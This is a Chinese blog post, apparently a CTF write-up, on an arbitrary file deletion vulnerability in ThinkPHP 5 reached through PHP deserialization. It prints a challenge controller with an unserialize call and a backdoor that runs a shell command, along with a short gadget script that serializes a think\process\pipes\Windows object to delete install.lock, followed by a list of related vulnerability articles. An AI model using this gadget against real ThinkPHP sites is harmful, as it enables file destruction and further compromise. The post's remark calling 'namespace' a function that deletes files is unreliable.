Thinkphp5存在任意文件删除漏洞

最新推荐文章于 2024-05-14 13:25:51 发布
最新推荐文章于 2024-05-14 13:25:51 发布
阅读量145 收藏
点赞数
分类专栏: # ctf 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74427106/article/details/134626206
版权
文章讲述了Thinkphp5.8之前的版本存在任意文件删除漏洞,通过利用`namespace`和反序列化功能绕过安全限制,文中举例了CTF挑战中的场景,并提供了利用漏洞删除`install.lock`文件的方法。强调了代码审计和安全防范的重要性。
摘要由CSDN通过智能技术生成

1.Thinkphp版本

Thinkphp5.8之前

2.Thinkphp任意文件删除漏洞

这个漏洞可以通过反序列化将环境中存在的文件删除

利用到php函数

namespace
/在PHP中,namespace是一个关键字,用于定义命名空间。命名空间是一种将相关的类、函数和常量分组在一起的方式,以避免命名冲突并提供更好的代码组织。

利用这个函数将文件删除,去绕过自己想绕过的文件

3.Thinkphp任意文件删除漏洞的利用

例如下题是ctfshow中月亮杯||的一道题

<?php
namespace app\index\controller;
class Index
{   
    public function index($run=[])
    {
        highlight_file(__FILE__);
        echo '<h1>Welcome to CTFSHOW</h1></br>';
        echo 'Powered by PHPthink5.0.2</br>';
        echo dirname(__FILE__);

    if (!empty($run[2])){
            echo 'ZmxhZyBpcyBub3QgaGVyZSBidXQgaXQgaXMgaW4gZmxhZy50eHQ=';
        }
    if (!empty($run[1])){
            unserialize($run[1]);
        }
    }
    // hint:/index/index/backdoor
    public function backdoor(){
        if (!file_exists(dirname(__FILE__).'/../../'."install.lock")){
        echo "Try to post CMD arguments".'<br/>';
            $data = input('post.');
            if (!preg_match('/flag/i',$data['cmd'])){
                $cmd = escapeshellarg($data['cmd']);
        $cmd='cat '.$cmd;
        echo $cmd;
                system($cmd);
            }else{
                echo "No No No";
            }

        }else{
        echo dirname(__FILE__).'/../../'."install.lock has not been deleted";
    }
    }
}

第一步先代码审计一波

这里在backdoor中有一个名为install.lock的文件,我们需要去绕过它,而进行我们下一步的操作

在上一个函数中我们看到了反序列化这个函数,并且我们可以查看框架版本5.0.2,可以利用这个漏洞,下一步就是写一个反序列化的脚本,去删除这个文件

<?php
namespace think\process\pipes;
use think\Process;
class Pipes{}
class Windows extends Pipes{
    private $files = [];
    function __construct(){
        $this->files = ["/var/www/html/application/index/controller/../../install.lock"];
    }
}
echo urlencode(serialize(New Windows()))."\n";
?>

通过这个反序列化然后传入参数就可以去删除这个文件,从而达到我们的目的

亲手擦亮那星
关注
专栏目录
thinkPHP删除单个文件
05-18
运用ThinkPHP技术进行上传,上传后可对指定的文件进行物理删除删除数据库中的指定的名称
Firefox 内存破坏漏洞
OSCS开源安全社区
08-25 329
在Firefox 103、Firefox ESR 102.1 和 Firefox ESR 91.12 中存在内存安全漏洞,其中一些错误回显包含敏感信息,攻击者可利用此漏洞执行任意代码。升级Firefox到104、Firefox ESR到102.2、Firefox ESR到91.13 或更高版本。Firefox 是一款网络浏览器。
任意文件删除漏洞描述
zkaqlaoniao的博客
12-22 190
这里是得到的json格式数据 我们可以通过手动的方式修改我们的1-21442Y3V.png 那么这里是上面上传的临时文件名 这里会进行删除 我们通过手动方式修改。第249行将$tmpfile = $uploadtmp./我们的文件名称移动到我们244-249的所创建的文件当中。../common.inc.php | 即可删除我们的连接数据库文件。5.我们通过上面的审计得到data/文件名称 为我们的临时位置。$tmpfile = $uploadtmp./我们的文件名称。修改为../../lynn.txt。
74CMS 3.0 任意文件删除漏洞
浅笑996的博客
12-08 654
一、 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二、代码审计 1.双击启动桌面Seay源代码审计系统软件 2.因为74CMS3.0源代码编辑使用GBK编辑,所以首先需要先将编码改成GBK 3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\74cms),点击确定 漏洞分析 1.点击展开左侧admin目录,在弹出的下拉列表中双...
漏洞复现-DiscuzX ≤3.4 任意文件删除漏洞
qq_59350385的博客
05-10 942
一、环境搭建 本次用的是vulhub靶场 执行下列命令部署 Discuz!X 安装环境 docker-compose up -d 安装时,只用修改数据库地址为`db`,其他保持默认即可: 二、漏洞复现 (1)访问`http://your-ip/robots.txt`可见robots.txt是存在的: (2)注册用户hahaha (3)在个人设置页面找到自己的formhash (4)带上自己的Cookie、formhash发送如下数据包 (5)查看个人设置页面的出生地
dscmsV2.0二次注入及任意文件删除漏洞分析1
08-03
本文将深入探讨dscmsV2.0系统中存在的二次注入和任意文件删除漏洞,这两个问题对系统的安全性构成严重威胁。我们将从程序目录结构、漏洞触发点以及代码分析等方面进行详细讲解。 首先,了解dscmsV2.0的基本目录结构...
ThinkPHP 6.0.1 漏洞分析(任意文件操作)
god_Zeo的安全博客
02-12 5274
漏洞描述 2020年1月10日,ThinkPHP团队发布一个补丁更新,修复了一处由不安全的SessionId导致的任意文件操作漏洞。该漏洞允许攻击者在目标环境启用session的条件下创建任意文件以及删除任意文件,在特定情况下还可以getshell。 具体受影响版 ThinkPHP6.0.0-6.0.1。 环境准备 /tp60/app/middleware.php 文件开启session 去掉se...
DscmsV2.0二次注入与任意文件删除漏洞深度剖析
1. 任意文件删除漏洞漏洞发生在后台,具体位于`application/admin/controller/Adv.php`文件的`adv_edit`函数中,第151行的代码设计缺陷导致了任意文件删除漏洞。当用户通过不当输入触发此函数时,如果没有正确的...
安全漏洞ThinkPHP 3.2.3 漏洞复现
HBohan的博客
09-04 1684
$this->show 造成命令执行 在 Home\Controller\IndexController 下的index中传入了一个可控参数,跟进调试看一下。 class IndexController extends Controller { public function index($n='') { $this->show('<style type="text/css">*{ padding: 0; margin: 0; } div{ paddi
ThinkPHP漏洞系列/2.x 任意代码执行漏洞
jammny
11-17 1423
漏洞详情: ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架。ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。 影响版本Thinkphp2.x系列以及ThinkPHP 3.0版.
CLTPHP 5.8 后台任意文件删除漏洞
weixin_50464560的博客
09-16 1031
CLTPHP 5.8 后台任意文件删除漏洞 一、漏洞简介 CLTPHP是基于ThinkPHP5开发,后台采用Layui框架的内容管理系统, 二、漏洞影响 CLTPHP 5.8及之前版本 三、复现过程 漏洞分析 app/admin/controller/Database.php 第221-248行: public function delSqlFiles() { $batchFlag = input('param.batchFlag', 0, 'intval'); //批量删除 if
任意文件读取及删除漏洞
qq_50854662的博客
09-27 2178
任意文件读取漏洞及危害 通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感信息文件,正常读取的文件没有经过校验或者不严格,用户可以控制这个变量读取任意文件任意文件读取漏洞,是web安全里高危的漏洞,...
【代码审计】任意文件删除漏洞实例
05-04 184
任意文件删除漏洞,该漏洞可让攻击者随意删除服务器上的任意文件。 环境搭建: CSCMS:http://www.chshcms.com/ 网站源码版本:Cscms_v4.1正式版(发布日期:2017-06-05) 程序源码下载:https://github.com/chshcms/cscms 漏洞实例一: 漏洞文件位置:\cscms\plugins\sys\...
thinkphp删除文件函数
chenrugang2009的博客
03-04 173
/** *删除目录或者文件 *@paramstring$path *@paramboolean$is_del_dir *@returnfixed */ functiondel_dir_or_file($path,$is_del_dir=FALSE){...
PHP代码审计 ----- 任意文件读取 & 删除漏洞
qq_62344745的博客
04-19 983
通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感信息文件正常读取的文件没有经过校验或者不严格,用户可以控制这个变量读取任意文件
php删除文件和目录函数,thinkphp删除目录和目录下所有文件文件夹函数
weixin_29144259的博客
03-12 194
/*** thinkphp删除目录和目录下所有文件文件夹函数* @param str $path 要删除文件路径或文件夹路径* @param int $delDir 是否删除文件夹,1或true删除文件夹,0或false则只删除文件保留文件夹(包含子文件夹)* @return bool 返回删除状态,true删除成功,false删除失败*/function delDirAndFile($p...
thinkphp删除文件方法
笔记
07-08 1194
unlink($_SESSION['ship_img']['0'])
WordPress插件WooCommerce任意文件删除漏洞解决方案及安全建议
XvrgMatlab的博客
09-26 123
记住定期更新、备份和监控您的网站,并采取必要的措施来保护您的登录凭证、使用强密码并限制登录尝试次数。通过采取这些步骤,您可以增强您网站的安全性,并减少潜在攻击的风险。通过综合使用这些方法,您可以大大提高您网站的安全性,并保护您的数据和用户信息免受潜在的攻击。为了确保您的网站安全,本文将提供解决该漏洞的方法,并提供一些建议以增强WordPress网站的安全性。希望本文提供的解决方案和安全建议能够帮助您解决WooCommerce插件的任意文件删除漏洞,并提升您WordPress网站的安全性。
用友NC printBill 任意文件读取/删除漏洞复现(XVE-2024-10609)
最新发布
0xSec
05-14 521
用友NC printBill 接口处存在任意文件读取/删除漏洞,未经身份验证的远程攻击者可利用该漏洞读取或删除系统敏感文件。使系统处于极不安全的状态。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值